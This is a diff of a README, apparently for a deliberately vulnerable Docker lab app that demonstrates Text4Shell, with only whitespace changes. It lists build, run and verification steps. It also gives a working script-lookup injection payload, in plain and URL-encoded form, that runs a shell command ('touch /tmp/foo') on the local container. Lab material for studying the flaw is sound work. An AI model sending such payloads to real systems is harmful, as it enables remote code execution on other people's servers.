| skipped 4 lines |
5 | 5 | | 1. Maven install to create the fat jar |
6 | 6 | | |
7 | 7 | | ``` |
8 | | - | mvn clean install |
| 8 | + | mvn clean install |
9 | 9 | | ``` |
10 | 10 | | |
11 | 11 | | 2. Docker build |
12 | 12 | | |
13 | 13 | | ``` |
14 | | - | docker build --tag=text4shell . |
| 14 | + | docker build --tag=text4shell . |
15 | 15 | | ``` |
16 | 16 | | |
17 | 17 | | 3. Docker run |
18 | 18 | | |
19 | 19 | | ``` |
20 | | - | docker run -p 80:8080 text4shell |
| 20 | + | docker run -p 80:8080 text4shell |
21 | 21 | | ``` |
22 | 22 | | |
23 | 23 | | 4. Test the app |
24 | 24 | | |
25 | 25 | | ``` |
26 | | - | http://localhost/text4shell/attack?search=<anything> |
| 26 | + | http://localhost/text4shell/attack?search=<anything> |
27 | 27 | | ``` |
28 | 28 | | |
29 | 29 | | 5. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup: |
30 | 30 | | |
31 | 31 | | ``` |
32 | | - | ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} |
| 32 | + | ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} |
33 | 33 | | ``` |
34 | 34 | | |
35 | | - | http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D |
| 35 | + | http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D |
36 | 36 | | |
37 | 37 | | 6. You can also try using `dns` or `url` prefixes. |
38 | 38 | | |
39 | 39 | | 7. Get the container id |
40 | 40 | | |
41 | 41 | | ``` |
42 | | - | docker container ls |
| 42 | + | docker container ls |
43 | 43 | | ``` |
44 | 44 | | |
45 | 45 | | 8. Get into the app |
46 | 46 | | |
47 | 47 | | ``` |
48 | | - | docker exec -it <container_id> bash |
| 48 | + | docker exec -it <container_id> bash |
49 | 49 | | ``` |
50 | 50 | | |
51 | 51 | | 9. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory): |
52 | 52 | | |
53 | 53 | | ``` |
54 | | - | ls /tmp/ |
| 54 | + | ls /tmp/ |
55 | 55 | | ``` |
56 | 56 | | |
57 | 57 | | 10. To stop the container |
58 | 58 | | |
59 | 59 | | ``` |
60 | | - | docker container stop <container_id> |
| 60 | + | docker container stop <container_id> |
61 | 61 | | ``` |